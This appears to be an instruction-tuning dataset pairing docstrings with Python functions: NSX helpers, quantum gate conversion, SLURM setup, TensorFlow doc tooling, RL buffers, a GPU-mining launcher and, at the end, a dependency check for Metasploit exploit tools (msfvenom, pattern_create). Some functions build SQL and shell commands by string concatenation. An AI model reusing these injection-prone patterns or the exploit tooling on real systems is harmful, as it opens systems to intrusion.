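        try:
            return func(**kwargs)
        except RuntimeError as ex:
            print('%s failed (%d attempts left): %s' % (func.__name__, attempt - 1, ex))
            if attempt == 1:
                raise
            time.sleep(delay)

calls = {'n': 0}
def flaky():
    calls['n'] += 1
    if calls['n'] < 3:
        raise RuntimeError('not ready yet')
    return 'done'

print(attempt_with_rerun(flaky))   # retries twice, then prints 'done'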
[/INST] def nsx_read(client_session, path, searched_resource, **kwargs): + raw_result = client_session.read( + searched_resource, **kwargs + ) + check_raw_result(raw_result) + path_list = path.split("/") + selected_obj = raw_result + for path in path_list: + if path not in selected_obj: + return None + selected_obj = selected_obj[path] + else: + return selected_obj +[INST] create path to searched part and convert part to list. [/INST] def nsx_struct_get_list(nsx_object, path): + path_list = path.split("/") + selected_obj = nsx_object + for path in path_list[:-1]: + if path not in selected_obj: + selected_obj[path] = {} + selected_obj = selected_obj[path] + last_part = path_list[-1] + if last_part not in selected_obj: + selected_obj[last_part] = [] + if isinstance(selected_obj[last_part], dict): + selected_obj[last_part] = [selected_obj[last_part]] + return selected_obj[last_part] +[INST] This function will check the last scan for any devices that are not listed in the whitelist.. [/INST] def validateHost(): + c = conn.cursor() + c.execute("select distinct id from scans order by 1 desc limit 1;") + row = c.fetchone() + count = 0 + if row: + c.execute("select * from scans where id = "+str(row[0])+" and mac not in (select mac from whitelist);") + rows = c.fetchall() + for row in rows: + print("Intruder detected in scan [%d] IP:[%s] MAC:[%s] VENDOR:[%s]" % (row[0], row[1], row[2], row[3])) + count = count+1 + return count +[INST] Tries to convert an OpenQL platform JSON file to a gatemap JSON file for +use with the DQCsim operator wrapper for OpenQL. Heuristics are applied to +convert common gate names to DQCsim equivalents, but you may need to do +some manual adjusting.. [/INST] def platform2gates(platform_fname, gates_fname): + with open(platform_fname, 'r') as f: + data = json.loads(f.read()) + insns = [] + for name in data.get('instructions', []): + insns.append(name.split()[0]) + for name, decomp in data.get('gate_decomposition', {}).items(): + insns.append(name.split()[0]) + for name in decomp: + insns.append(name.split()[0]) + if not insns: + print('No instructions found!') + new_insns = [] + seen = set() + for insn in insns: + if insn not in seen: + seen.add(insn) + new_insns.append(insn) + insns = new_insns + unknown_gates = set() + def to_json_line(openql): + dqcsim = { + 'i': '"I"', + 'x': '"X"', + 'y': '"Y"', + 'z': '"Z"', + 'h': '"H"', + 's': '"S"', + 'sdag': '"S_DAG"', + 't': '"T"', + 'tdag': '"T_DAG"', + 'x90': '"RX_90"', + 'xm90': '"RX_M90"', + 'mx90': '"RX_M90"', + 'x180': '"RX_180"', + 'rx90': '"RX_90"', + 'rxm90': '"RX_M90"', + 'rx180': '"RX_180"', + 'rx': '"RX"', + 'y90': '"RY_90"', + 'ym90': '"RY_M90"', + 'my90': '"RY_M90"', + 'y180': '"RY_180"', + 'ry90': '"RY_90"', + 'rym90': '"RY_M90"', + 'ry180': '"RY_180"', + 'ry': '"RY"', + 'z90': '"RZ_90"', + 'zm90': '"RZ_M90"', + 'mz90': '"RZ_M90"', + 'z180': '"RZ_180"', + 'rz90': '"RZ_90"', + 'rzm90': '"RZ_M90"', + 'rz180': '"RZ_180"', + 'rz': '"RZ"', + 'swap': '"SWAP"', + 'move': '"SWAP"', + 'sqswap': '"SQSWAP"', + 'sqrtswap': '"SQSWAP"', + 'cx': '"C-X"', + 'ccx': '"C-C-X"', + 'cy': '"C-Y"', + 'ccy': '"C-C-Y"', + 'cz': '"C-Z"', + 'ccz': '"C-C-Z"', + 'cphase': '"C-PHASE"', + 'ccphase': '"C-C-PHASE"', + 'cnot': '"C-X"', + 'ccnot': '"C-C-X"', + 'toffoli': '"C-C-X"', + 'cswap': '"C-SWAP"', + 'fredkin': '"C-SWAP"', + 'meas': '"measure"', + 'measx': '{\n "type": "measure",\n "basis": "x"\n }', + 'measy': '{\n "type": "measure",\n "basis": "y"\n }', + 'measz': '"measure"', + 'prep': '"prep"', + 'prepx': '{\n "type": "prep",\n "basis": 
"x"\n }', + 'prepy': '{\n "type": "prep",\n "basis": "y"\n }', + 'prepz': '"prep"', + }.get( + openql + .replace('_', '') + .replace('-', '') + .replace('measure', 'meas') + .lower(), + None) + if dqcsim is None: + unknown_gates.add(openql) + dqcsim = '{\n UNKNOWN?\n }' + openql = '"{}":'.format(openql) + return ' {} {},'.format(openql, dqcsim) + output = ['{'] + for insn in insns: + output.append(to_json_line(insn)) + if output: + output[-1] = output[-1][:-1] + output.append('}') + output = '\n'.join(output) + with open(gates_fname, 'w') as f: + f.write(output) + if unknown_gates: + print('The following gates were not automatically recognized:') + print() + for gate in sorted(unknown_gates): + print(' - {}'.format(gate)) + print() + print('You\'ll need to edit the output file!') + else: + print('All gates were heuristically recognized! Double-check the file, though.') +[INST] Command-line entry point for the platform2gates utility.. [/INST] def platform2gates_cli(): + if len(sys.argv) != 3: + print('Usage: platform2gates ') + print() + print('\n'.join(map(str.strip, platform2gates.__doc__.split('\n')))) + print() + print('This is part of the dqcsim-openql-mapper Python3/pip package.') + sys.exit(1) + platform2gates(sys.argv[1], sys.argv[2]) +[INST] Runs the Deutsch-Jozsa algorithm on the given oracle. The oracle is +called with the input and output qubits as positional arguments.. [/INST] def deutsch_jozsa(self, qi, qo, oracle, expected): + self.prepare(qi) + self.h_gate(qi) + self.prepare(qo) + self.x_gate(qo) + self.h_gate(qo) + oracle(qi, qo) + self.h_gate(qi) + self.measure(qi) + if self.get_measurement(qi).value: + self.info('Oracle was balanced!') + if expected != 'balanced': + raise ValueError('unexpected oracle result!') + else: + self.info('Oracle was constant!') + if expected != 'constant': + raise ValueError('unexpected oracle result!') +[INST] r"""Heuristic to determine if a slurm job is a batch job or not. Batch jobs +will have a job name that is not a shell unless the user specifically set the job +name to that of a shell. Interactive jobs have a shell name as their job name.. [/INST] def is_slurm_batch_job() -> bool: + return is_slurm_job() and os.environ.get("SLURM_JOB_NAME", None) not in ( + None, + "bash", + "zsh", + "fish", + "tcsh", + "sh", + ) +[INST] r"""Saves the interrupted job state to the specified filename. +This is useful when working with preemptable job partitions. + +This method will do nothing if SLURM is not currently being used and the filename is the default. [/INST] def save_interrupted_state(state: Any, filename: str = None): + if SLURM_JOBID is None and filename is None: + logger.warn("SLURM_JOBID is none, not saving interrupted state") + return + if filename is None: + filename = INTERRUPTED_STATE_FILE + if not osp.exists(osp.dirname(INTERRUPTED_STATE_FILE)): + raise RuntimeError( + "Please create a .interrupted_states directory in your home directory for job preemption" + "(This is intentionally not created automatically as it can get quite large)" + ) + torch.save(state, filename) +[INST] r"""Initializes torch.distributed by parsing environment variables set +by SLURM when ``srun`` is used or by parsing environment variables set +by torch.distributed.launch. 
[/INST] def init_distrib_slurm( + backend: str = "nccl", +) -> Tuple[int, torch.distributed.TCPStore]: + assert ( + torch.distributed.is_available() + ), "torch.distributed must be available" + if "GLOO_SOCKET_IFNAME" not in os.environ: + os.environ["GLOO_SOCKET_IFNAME"] = get_ifname() + if "NCCL_SOCKET_IFNAME" not in os.environ: + os.environ["NCCL_SOCKET_IFNAME"] = get_ifname() + local_rank, world_rank, world_size = get_distrib_size() + master_port = int(os.environ.get("MASTER_PORT", DEFAULT_PORT)) + if SLURM_JOBID is not None: + master_port += int(SLURM_JOBID) % int( + os.environ.get("MASTER_PORT_RANGE", DEFAULT_PORT_RANGE) + ) + master_addr = os.environ.get("MASTER_ADDR", DEFAULT_MASTER_ADDR) + tcp_store = distrib.TCPStore( + master_addr, master_port, world_size, world_rank == 0 + ) + distrib.init_process_group( + backend, store=tcp_store, rank=world_rank, world_size=world_size + ) + return local_rank, tcp_store +[INST] Return the number of steps +necessary to calculate +`print countdown(n)`. [/INST] def time(n): + steps = 0 + steps += 3 + 2 * math.ceil(n / 5.0) + return steps +[INST] Updates keyboard and mouse input.. [/INST] def update(self): + for c in range(len(self.keyCodes)): + kc = self.keyCodes[c] + if kc is None: + continue + if "mouse_" in kc: + continue + else: + newstate = keyboard.is_pressed(kc) + if self.pressed[c] != newstate and newstate is True: + self.counts[c] += 1 + self.event_queue.append(time.time()) + self.pressed[c] = newstate + if keyboard.is_pressed(self.reset): + self.counts = [0 for x in range(len(self.keyCodes))] +[INST] Return a PageInfo object describing a given object from the TF API. +This function resolves `tf.symbol` references in the docstrings into links +to the appropriate location.. [/INST] def docs_for_object( + *, + api_node: doc_generator_visitor.ApiTreeNode, + parser_config: config.ParserConfig, + extra_docs: Optional[Dict[int, str]] = None, + search_hints: bool = True, + page_builder_classes: Optional[PageBuilderDict] = None, +) -> base_page.PageInfo: + if page_builder_classes is None: + page_builder_classes = _DEFAULT_PAGE_BUILDER_CLASSES + page_info_class = doc_controls.get_custom_page_builder_cls(api_node.py_object) + if page_info_class is None: + obj_type = obj_type_lib.ObjType.get(api_node.py_object) + page_info_class = page_builder_classes[obj_type] + page_info = page_info_class( + api_node=api_node, + search_hints=search_hints, + extra_docs=extra_docs, + parser_config=parser_config) + page_info.docs_for_object() + return page_info +[INST] Visits the `FunctionDef` node in AST tree and extracts the typehints.. 
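Editor's aside: the distributed-init helper above derives the rendezvous port from the SLURM job id so concurrent jobs on one cluster do not collide. A tiny sketch of that arithmetic; the base port and range constants here are assumed values for illustration, not guaranteed to match the original module's defaults.

DEFAULT_PORT = 8738          # assumed base port
DEFAULT_PORT_RANGE = 127     # assumed range

def master_port_for_job(slurm_jobid, base_port=DEFAULT_PORT,
                        port_range=DEFAULT_PORT_RANGE):
    # offset the base port by the job id modulo the allowed range
    return base_port + int(slurm_jobid) % port_range

print(master_port_for_job('123456'))   # deterministic per job id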
[/INST] def visit_FunctionDef(self, node) -> None: + if node.returns: + self.return_annotation = _source_from_ast(node.returns) + for arg in node.args.args: + if arg.annotation: + self.annotations[arg.arg] = _source_from_ast(arg.annotation) + self.arguments_typehint_exists = True + for kwarg in node.args.kwonlyargs: + if kwarg.annotation: + self.annotations[kwarg.arg] = _source_from_ast(kwarg.annotation) + self.arguments_typehint_exists = True + last_n_pos_args = node.args.args[-1 * len(node.args.defaults):] + for arg, default_val in zip(last_n_pos_args, node.args.defaults): + if default_val is not None: + text_default_val = self._preprocess_default(default_val) + self.defaults[arg.arg] = text_default_val + for kwarg, default_val in zip(node.args.kwonlyargs, node.args.kw_defaults): + if default_val is not None: + text_default_val = self._preprocess_default(default_val) + self.defaults[kwarg.arg] = text_default_val +[INST] Vists an assignment with a type annotation. Dataclasses is an example.. [/INST] def visit_AnnAssign(self, node) -> None: + arg = _source_from_ast(node.target) + self.annotations[arg] = _source_from_ast(node.annotation) + if node.value is not None: + self.defaults[arg] = self._preprocess_default(node.value) +[INST] Vists an assignment with a type annotation. Dataclasses is an example.. [/INST] def visit_Assign(self, node) -> None: + names = [_source_from_ast(t) for t in node.targets] + if node.value is not None: + val = self._preprocess_default(node.value) + for name in names: + self.defaults[name] = val +[INST] Return a link to an object's api page if found.. [/INST] def maybe_add_link(self, source: str, value: Any) -> str: + cls = type(value) + value_name = self._reverse_index.get(id(value), None) + cls_name = self._reverse_index.get(id(cls), None) + if cls_name is not None: + before = source.split('(')[0] + cls_short_name = cls_name.split('.')[-1] + if before.endswith(cls_short_name): + return self.get_link(source, cls_name) + if value_name is not None: + return self.get_link(value_name, value_name) + return source +[INST] Links type annotations to its page if it exists.. [/INST] def preprocess(self, string: str, value: Any) -> str: + obj_anno_full_name = self._reverse_index.get(id(value), None) + if obj_anno_full_name is not None: + return self.get_link(obj_anno_full_name) + non_builtin_ast_types = self._get_non_builtin_ast_types(string) + try: + non_builtin_type_objs = self._extract_non_builtin_types(value, []) + except RecursionError: + non_builtin_type_objs = {} + if len(non_builtin_type_objs) != len(non_builtin_ast_types): + non_builtin_map = {} + else: + non_builtin_map = dict(zip(non_builtin_ast_types, non_builtin_type_objs)) + partial_func = functools.partial(self._linkify, non_builtin_map) + return self._INDIVIDUAL_TYPES_RE.sub(partial_func, string) +[INST] Creates a text representation of the args in a method/function.. [/INST] def format_args(self, args: List[inspect.Parameter]) -> List[str]: + args_text_repr = [] + for arg in args: + typeanno = None + if arg.annotation is not EMPTY: + value, source = arg.annotation + if source is not None: + typeanno = self.preprocess(source, value) + if typeanno: + args_text_repr.append(f'{arg.name}: {typeanno}') + else: + args_text_repr.append(f'{arg.name}') + return args_text_repr +[INST] Creates a text representation of the kwargs in a method/function.. 
[/INST] def format_kwargs(self, kwargs: List[inspect.Parameter]) -> List[str]: + kwargs_text_repr = [] + for kwarg in kwargs: + default_text = None + if kwarg.default is not EMPTY: + default_val, default_source = kwarg.default + if default_source is None: + default_source = strip_obj_addresses(repr(default_val)) + default_source = html.escape(default_source) + default_text = self.maybe_add_link(default_source, default_val) + typeanno = None + if kwarg.annotation is not EMPTY: + anno_value, anno_source = kwarg.annotation + if anno_source is not None: + typeanno = self.preprocess(anno_source, anno_value) + if typeanno is not None and default_text is not None: + kwargs_text_repr.append(f'{kwarg.name}: {typeanno} = {default_text}') + elif default_text is not None: + kwargs_text_repr.append(f'{kwarg.name}={default_text}') + elif typeanno is not None: + kwargs_text_repr.append(f'{kwarg.name}: {typeanno}') + else: + kwargs_text_repr.append(kwarg.name) + return kwargs_text_repr +[INST] Extract ast defaults and annotations form a dataclass.. [/INST] def _extract_class_defaults_and_annotations( + cls: Type[object]) -> AnnotsDefaultsReturns: + ast_visitor = _ClassDefaultAndAnnotationExtractor() + ast_visitor.extract(cls) + return (ast_visitor.annotations, ast_visitor.defaults, + ast_visitor.return_annotation) +[INST] Extract ast defaults and annotations form a standard callable.. [/INST] def _extract_arg_defaults_and_annotations( + func: Callable[..., Any]) -> AnnotsDefaultsReturns: + ast_visitor = _ArgDefaultAndAnnotationExtractor() + annotation_source_dict = {} + defaults_source_dict = {} + return_annotation_source = EMPTY + try: + ast_visitor.extract(func) + except Exception: + pass + else: + annotation_source_dict = ast_visitor.annotations + defaults_source_dict = ast_visitor.defaults + return_annotation_source = ast_visitor.return_annotation + return annotation_source_dict, defaults_source_dict, return_annotation_source +[INST] Extracts the decorators on top of functions/methods.. [/INST] def extract_decorators(func: Any) -> List[str]: + class ASTDecoratorExtractor(ast.NodeVisitor): + def __init__(self): + self.decorator_list = [] + def visit_FunctionDef(self, node): + for dec in node.decorator_list: + self.decorator_list.append(_source_from_ast(dec)) + visitor = ASTDecoratorExtractor() + func_ast = get_source.get_ast(func) + if func_ast is not None: + visitor.visit(func_ast) + return visitor.decorator_list +[INST] Recursively enumerate all members of `root`. +Similar to the Python library function `os.path.walk`. + +Traverses the tree of Python objects starting with `root`, depth first. +Parent-child relationships in the tree are defined by membership in modules or +classes. + +If `root` is not a module or class, `visit` is never called. `traverse` +never descends into built-in modules. + + + +Cycles (determined by reference equality, `is`) stop the traversal. A stack of +objects is kept to find cycles. + +Traversing system modules can take a long time, it is advisable to pass a +`visit` callable which denylists such modules.. [/INST] def traverse(root, filters, accumulator, root_name) -> None: + _Traverser(filters, accumulator).traverse(root, [], (root_name,)) +[INST] Returns a list of symbol names imported by the given `obj`.. 
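Editor's aside: a self-contained illustration of the AST technique behind the annotation/default extractors above: parse a function's source and pull out the annotation and default-value source text. The sample function is made up, and `ast.unparse` assumes Python 3.9+.

import ast
import inspect
import textwrap

def sample(a: int, b: str = 'x' * 3) -> bool:
    return bool(a) and bool(b)

tree = ast.parse(textwrap.dedent(inspect.getsource(sample)))
fn = tree.body[0]

annotations = {arg.arg: ast.unparse(arg.annotation)
               for arg in fn.args.args if arg.annotation is not None}
defaults = [ast.unparse(d) for d in fn.args.defaults]
returns = ast.unparse(fn.returns) if fn.returns else None

print(annotations)   # {'a': 'int', 'b': 'str'}
print(defaults)      # ["'x' * 3"]
print(returns)       # bool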
[/INST] def _get_imported_symbols(obj: Union[str, types.ModuleType]): + class ImportNodeVisitor(ast.NodeVisitor): + def __init__(self): + self.imported_symbols = [] + def _add_imported_symbol(self, node): + for alias in node.names: + name = alias.asname or alias.name + if name == '*': + continue + if '.' in name: + continue + self.imported_symbols.append(name) + def visit_Import(self, node): + self._add_imported_symbol(node) + def visit_ImportFrom(self, node): + self._add_imported_symbol(node) + tree = get_source.get_ast(obj) + if tree is None: + return [] + visitor = ImportNodeVisitor() + visitor.visit(tree) + return visitor.imported_symbols +[INST] Add properties to Proto classes, so they can be documented. +Warning: This inserts the Properties into the class so the rest of the system +is unaffected. This patching is acceptable because there is never a reason to +run other tensorflow code in the same process as the doc generator.. [/INST] def add_proto_fields(path: Sequence[str], parent: Any, + children: Children) -> Children: + del path + if not inspect.isclass(parent) or not issubclass(parent, ProtoMessage): + return children + descriptor = getattr(parent, 'DESCRIPTOR', None) + if descriptor is None: + return children + fields = descriptor.fields + if not fields: + return children + field = fields[0] + field_types = { + getattr(field, name): name + for name in dir(field) + if name.startswith('TYPE') + } + labels = { + getattr(field, name): name + for name in dir(field) + if name.startswith('LABEL') + } + field_properties = {} + for field in fields: + name = field.name + doc_parts = [] + label = labels[field.label].lower().replace('label_', '') + if label != 'optional': + doc_parts.append(label) + type_name = field_types[field.type] + if type_name == 'TYPE_MESSAGE': + type_name = field.message_type.name + elif type_name == 'TYPE_ENUM': + type_name = field.enum_type.name + else: + type_name = type_name.lower().replace('type_', '') + doc_parts.append(type_name) + doc_parts.append(name) + doc = '`{}`'.format(' '.join(doc_parts)) + prop = property(fget=lambda x: x, doc=doc) + field_properties[name] = prop + for name, prop in field_properties.items(): + setattr(parent, name, prop) + children = dict(children) + children.update(field_properties) + children = sorted(children.items(), key=lambda item: item[0]) + return children +[INST] Filters module children to remove builtin modules.. [/INST] def filter_builtin_modules(path: Sequence[str], parent: Any, + children: Children) -> Children: + del path + del parent + filtered_children = [] + for name, child in children: + if inspect.ismodule(child) and child.__name__ in sys.builtin_module_names: + continue + filtered_children.append((name, child)) + return filtered_children +[INST] Converts an ApiTreeNode to a list of toc entries.. [/INST] def _entries_from_api_node( + self, api_node: doc_generator_visitor.ApiTreeNode) -> List[Entry]: + obj_type = api_node.obj_type + if obj_type is obj_type_lib.ObjType.MODULE: + return [self._make_section(api_node)] + if obj_type is obj_type_lib.ObjType.CLASS: + return self._flat_class_entries(api_node) + if obj_type in [ + obj_type_lib.ObjType.CALLABLE, obj_type_lib.ObjType.TYPE_ALIAS + ]: + return [self._make_link(api_node)] + else: + return [] +[INST] Returns the toc.Status of an ApiTreeNode.. 
[/INST] def _make_status(self, api_node: doc_generator_visitor.ApiTreeNode): + if self._is_deprecated(api_node): + return Status.DEPRECATED + if self._is_experimental(api_node): + return Status.EXPERIMENTAL + return None +[INST] Checks if an object is deprecated or not. +Each deprecated function has a `_tf_decorator.decorator_name` attribute. +Check the docstring of that function to confirm if the function was +indeed deprecated. If a different deprecation setting was used on the +function, then "THIS FUNCTION IS DEPRECATED" substring won't be inserted +into the docstring of that function by the decorator.. [/INST] def _is_deprecated(self, api_node: doc_generator_visitor.ApiTreeNode): + if doc_controls.is_deprecated(api_node.py_object): + return True + decorator_list = signature.extract_decorators(api_node.py_object) + if any('deprecat' in dec for dec in decorator_list): + docstring = getattr(api_node.py_object, '__doc__') or '' + return 'THIS FUNCTION IS DEPRECATED' in docstring + return False +[INST] For top-level modules, place the submodules as peers.. [/INST] def _flat_module_entries(self, + api_node: doc_generator_visitor.ApiTreeNode, + title: Optional[str] = None) -> List[Section]: + title = title or api_node.short_name + overview = self._make_link(api_node, title='Overview') + entries = [] + submodule_sections = [] + for name, child_node in api_node.children.items(): + if child_node.obj_type is obj_type_lib.ObjType.MODULE: + subtitle = f'{title}.{name}' + submodule_sections.append( + self._make_section(child_node, title=subtitle)) + else: + entries.extend(self._entries_from_api_node(child_node)) + entries = sorted(entries, key=self._section_order_key) + entries.insert(0, overview) + submodule_sections = sorted(submodule_sections, key=self._section_order_key) + status = self._make_status(api_node) + module_section = Section(title=title, section=entries, status=status) + return [module_section] + submodule_sections +[INST] Write previously extracted docs to disk. +Write a docs page for each symbol included in the indices of parser_config to +a tree of docs at `output_dir`. + +Symbols with multiple aliases will have only one page written about +them, which is referenced for all aliases.. 
[/INST] def write_docs( + *, + output_dir: Union[str, pathlib.Path], + parser_config: config.ParserConfig, + yaml_toc: Union[bool, Type[toc_lib.TocBuilder]], + root_module_name: str, + root_title: str = 'TensorFlow', + search_hints: bool = True, + site_path: str = 'api_docs/python', + gen_redirects: bool = True, + gen_report: bool = True, + extra_docs: Optional[Dict[int, str]] = None, + page_builder_classes: Optional[docs_for_object.PageBuilderDict] = None, +): + output_dir = pathlib.Path(output_dir) + site_path = pathlib.Path('/', site_path) + if not output_dir.is_absolute(): + raise ValueError("'output_dir' must be an absolute path.\n" + f" output_dir='{output_dir}'") + output_dir.mkdir(parents=True, exist_ok=True) + redirects = [] + api_report = None + if gen_report: + api_report = utils.ApiReport() + num_docs_output = 0 + for api_node in parser_config.api_tree.iter_nodes(): + full_name = api_node.full_name + if api_node.output_type() is api_node.OutputType.FRAGMENT: + continue + try: + page_info = docs_for_object.docs_for_object( + api_node=api_node, + parser_config=parser_config, + extra_docs=extra_docs, + search_hints=search_hints, + page_builder_classes=page_builder_classes) + if api_report is not None and not full_name.startswith( + ('tf.compat.v', 'tf.keras.backend', 'tf.numpy', + 'tf.experimental.numpy')): + api_report.fill_metrics(page_info) + except Exception as e: + raise ValueError( + f'Failed to generate docs for symbol: `{full_name}`') from e + path = output_dir / parser.documentation_path(full_name) + try: + path.parent.mkdir(exist_ok=True, parents=True) + path.write_text(page_info.page_text, encoding='utf-8') + num_docs_output += 1 + except OSError as e: + raise OSError('Cannot write documentation for ' + f'{full_name} to {path.parent}') from e + duplicates = parser_config.duplicates.get(full_name, []) + if not duplicates: + continue + duplicates = [item for item in duplicates if item != full_name] + if gen_redirects: + for dup in duplicates: + from_path = site_path / dup.replace('.', '/') + to_path = site_path / full_name.replace('.', '/') + redirects.append({'from': str(from_path), 'to': str(to_path)}) + if api_report is not None: + api_report.write(output_dir / root_module_name / 'api_report.pb') + if num_docs_output <= 1: + raise ValueError('The `DocGenerator` failed to generate any docs. Verify ' + 'your arguments (`base_dir` and `callbacks`). ' + 'Everything you want documented should be within ' + '`base_dir`.') + if yaml_toc: + if isinstance(yaml_toc, bool): + yaml_toc = toc_lib.FlatModulesTocBuilder + toc = yaml_toc(site_path).build(parser_config.api_tree) + toc_path = output_dir / root_module_name / '_toc.yaml' + toc.write(toc_path) + if redirects and gen_redirects: + redirects_dict = { + 'redirects': sorted(redirects, key=lambda redirect: redirect['from']) + } + api_redirects_path = output_dir / root_module_name / '_redirects.yaml' + with open(api_redirects_path, 'w') as redirect_file: + yaml.dump(redirects_dict, redirect_file, default_flow_style=False) + with open(output_dir / root_module_name / 'all_symbols.md', 'w') as f: + global_index = parser.generate_global_index( + root_title, parser_config.index, parser_config.reference_resolver) + if not search_hints: + global_index = 'robots: noindex\n' + global_index + f.write(global_index) +[INST] Returns a random sample from the buffer. +Parameters + +batch_size : int +The number of observations to sample.. 
[/INST] def sample(self, batch_size): + return sample(self.memory, batch_size) +[INST] Adds a transition to the buffer and add an initial prioritization. +Parameters + +args +The state, action, reward, next_state, done tuple. [/INST] def append(self, *args, **kwargs): + idx = self.position + super().append(*args, **kwargs) + self._it_sum[idx] = self._max_priority ** self._alpha + self._it_min[idx] = self._max_priority ** self._alpha +[INST] Sample a batch of experiences. +while returning importance weights and idxes +of sampled experiences. + +Parameters + +int +How many transitions to sample. +beta: float +To what degree to use importance weights +(0 - no corrections, 1 - full correction) + +Returns + +np.array +Array of shape (batch_size,) and dtype np.float32 +denoting importance weight of each sampled transition +idxes: np.array +Array of shape (batch_size,) and dtype np.int32 +idexes in buffer of sampled experiences. [/INST] def sample(self, batch_size, beta): + assert beta > 0 + idxes = self._sample_proportional(batch_size) + weights = [] + p_min = self._it_min.min() / self._it_sum.sum() + max_weight = (p_min * len(self.memory)) ** (-beta) + for idx in idxes: + p_sample = self._it_sum[idx] / self._it_sum.sum() + weight = (p_sample * len(self.memory)) ** (-beta) + weights.append(weight / max_weight) + weights = np.array(weights) + encoded_sample = tuple(zip(*self._encode_sample(idxes))) + batch = list(zip(*encoded_sample, weights, idxes)) + return batch +[INST] Update priorities of sampled transitions. +sets priority of transition at index idxes[i] in buffer +to priorities[i]. + +Parameters + +[int] +List of idxes of sampled transitions +priorities: [float] +List of updated priorities corresponding to +transitions at the sampled idxes denoted by +variable `idxes`.. [/INST] def update_priorities(self, idxes, priorities): + assert len(idxes) == len(priorities) + priorities += np.finfo('float').eps + for idx, priority in zip(idxes, priorities): + if priority < 0: + priority = np.finfo('float').eps + assert 0 <= idx < len(self.memory) + self._it_sum[idx] = priority ** self._alpha + self._it_min[idx] = priority ** self._alpha + self._max_priority = max(self._max_priority, priority) +[INST] Forcing gradients to stay within a certain interval +by setting it to the bound if it goes over it. + +Parameters + +x : number > 0 +Sets the interval to be [-x, x]. [/INST] def clamp_gradients(self, x=1): + assert x > 0 + for param in self.model.parameters(): + param.grad.data.clamp_(-x, x) +[INST] Clears out gradients held in the model.. [/INST] def zero_grad(self): + self.model.zero_grad() +[INST] Run a step of the optimizer on `model`.. [/INST] def step(self): + self.optimizer.step() +[INST] Calculate gradients by shifting parameters +towards the networks with the highest fitness value. + +This is calculated by evaluating the fitness of multiple +networks according to the fitness function specified in +the class.. 
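As a small numeric illustration of the importance-sampling weights computed by the prioritized sample() above, here is a self-contained sketch. The priorities, alpha and beta values are made up, and the proportional probabilities are computed directly instead of through a segment tree.

import numpy as np

def importance_weights(priorities, alpha=0.6, beta=0.4):
    # Proportional prioritization: P(i) = p_i^alpha / sum_k p_k^alpha
    scaled = np.asarray(priorities, dtype=np.float64) ** alpha
    probs = scaled / scaled.sum()
    # w_i = (N * P(i))^-beta, normalized by the largest weight so that w_i <= 1
    weights = (len(priorities) * probs) ** (-beta)
    return weights / weights.max()

print(importance_weights([1.0, 0.5, 2.0, 0.1]))  # the lowest-priority item gets weight 1.0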
[/INST] def calc_gradients(self, *args): + white_noise_dict, noise_dict = self._generate_noise_dicts() + candidate_solutions = self._generate_candidate_solutions(noise_dict) + fitness_values = torch.tensor( + [self.fitness(x, *args) for x in candidate_solutions], + device=self.device + ) + if log.enabled: + log.Logger[self.name + "/" + "fitness_value"].append(fitness_values.mean().item()) + fitness_values = (fitness_values - fitness_values.mean()) / (fitness_values.std() + np.finfo('float').eps) + self.zero_grad() + for name, param in self.model.named_parameters(): + if param.requires_grad: + noise_dim_n = len(white_noise_dict[name].shape) + dim = np.repeat(1, noise_dim_n - 1).tolist() if noise_dim_n > 0 else [] + param.grad = (white_noise_dict[name] * fitness_values.float().reshape(self.population_size, *dim)).mean(0) / self.sigma +[INST] Perform a full state sync with the originating model.. [/INST] def sync(self): + self.target_model.load_state_dict(self.model.state_dict()) +[INST] Partially move closer to the parameters of the originating +model by updating parameters to be a mix of the +originating and the clone models. + +Parameters + +tau : number +A number between 0-1 which indicates +the proportion of the originator and clone in the new clone.. [/INST] def partial_sync(self, tau): + assert isinstance(tau, float) + assert 0.0 < tau <= 1.0 + model_state = self.model.state_dict() + target_state = self.target_model.state_dict() + for grad_index, grad in model_state.items(): + target_state[grad_index].copy_((1 - tau) * target_state[grad_index] + tau * grad) + self.target_model.load_state_dict(target_state) +[INST] Adds a log-based probability to the observation.. [/INST] def append_log_probs(self, logprob): + self.log_probs.append(logprob) +[INST] Clears the transitions and log-based probabilities.. [/INST] def clear(self): + self.memory.clear() + self.log_probs.clear() +[INST] Return a list of the transitions with their +associated log-based probabilities.. [/INST] def recall(self): + if len(self.memory) != len(self.log_probs): + raise ValueError("Memory and recorded log probabilities must be the same length.") + return list(zip(*tuple(zip(*self.memory)), self.log_probs)) +[INST] None +Prompt user to set up commands for mining on their machine. [/INST] def mine(): + try: + mining_path = os.path.expanduser('~/.vectordash/mining/mine.sh') + pid_path = os.path.expanduser('~/.vectordash/mining/pid') + if os.path.exists(mining_path): + subprocess.call("chmod +x " + mining_path, shell=True) + process = subprocess.Popen(mining_path) + pid_file = open(pid_path, 'w') + pid_file.write(str(process.pid)) + pid_file.close() + else: + print("Please run " + stylize("vdhost setcommands", fg("blue")) + " before trying to mine.") + except Exception as e: + print(stylize("The following error was thrown: ", fg("red")) + str(e)) + print(stylize("Your mining commands could not be executed. Are you sure you are using absolute paths?", + fg("red"))) +[INST] None +Prompt user to set up commands for mining on their machine. [/INST] def stop(): + try: + pid_path = os.path.expanduser('~/.vectordash/mining/pid') + if os.path.exists(pid_path): + pid_file = open(pid_path, 'r') + pid = pid_file.read() + pid_file.close() + if int(pid) < 0: + print("Not currently mining. 
Run " + stylize("vdhost mine", fg("blue")) + " to start mining") + return + subprocess.call("kill -- -$(ps -o pgid= " + pid + " | grep -o [0-9]*)", shell=True) + while pid_exists(pid): + print("Attempting to force kill subprocess") + subprocess.call("kill -9 -p " + pid, shell=True) + pid_file = open(pid_path, 'w') + pid_file.write("-1") + pid_file.close() + else: + print("Please run " + stylize("vdhost mine", fg("blue")) + " before trying to stop mining.") + return + except ValueError as e: + print(stylize("The following error was thrown: ", fg("red")) + str(e)) + print(stylize("Your mining commands could not be executed. Are you sure you are using absolute paths?", + fg("red"))) +[INST] Check whether pid exists in the current process table. +UNIX only.. [/INST] def pid_exists(pid): + try: + print("Double-checking to ensure process was killed") + os.kill(int(pid), 0) + except OSError: + print("pid: " + pid + " killed") + return False + else: + print("pid: " + pid + " still exists") + return True +[INST] Checks if all required binaries are available. [/INST] def check_dependencies(): + dependencies = ['msf-pattern_create', 'msf-pattern_offset', 'msfvenom'] + deps_ok = True + for dep in dependencies: + try: + sub.call(dep, stdout=sub.DEVNULL, stderr=sub.DEVNULL) + except OSError: + deps_ok = False + print_error('Missing binary: {}'.format(dep)) + if not deps_ok: + print_info('You need to install the Metasploit Framework') + return deps_ok +[INST] Prints a welcome message to the screen. [/INST] def print_welcome(): + print('''{} + ╔═╗┬┌┬┐┌─┐┬ ┌─┐ + 